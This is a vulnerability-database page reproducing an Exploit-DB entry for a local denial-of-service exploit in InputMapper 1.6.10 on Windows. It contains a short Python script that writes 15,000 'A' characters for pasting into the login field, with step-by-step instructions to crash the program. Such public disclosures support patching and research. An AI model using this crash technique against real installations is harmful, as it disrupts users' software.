Lucene search
K

InputMapper 1.6.10 - Denial of Service

🗓️ 23 Sep 2019 00:00:00Reported by elkoyote07Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 645 Views

InputMapper < 1.6.10 Local Denial of Service exploit affecting Windows 1

Code
# Exploit Title: InputMapper < 1.6.10 Local Denial of Service
# Date: 20.09.2019
# Vendor Homepage: https://inputmapper.com/
# Software Link: https://inputmapper.com/downloads/category/2-input-mapper
# Exploit Author: elkoyote07
# Tested Version: 1.6.10
# Tested on: Windows 10 x64


# 1.- Start Input Mapper
# 2.- Click on Guest (Top left)
# 3.- Click on Login
# 3.- Copy the content of exploit.txt in the Username field
# 4.- Once copied double-click on Username field
# 5.- Happy crash :)




#!/usr/bin/python

t = "A" * 15000

try:
f=open("exploit.txt","w")
f.write(t)
f.close()
print "Done"
except:
print "Error"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Sep 2019 00:00Current
7High risk
Vulners AI Score7
645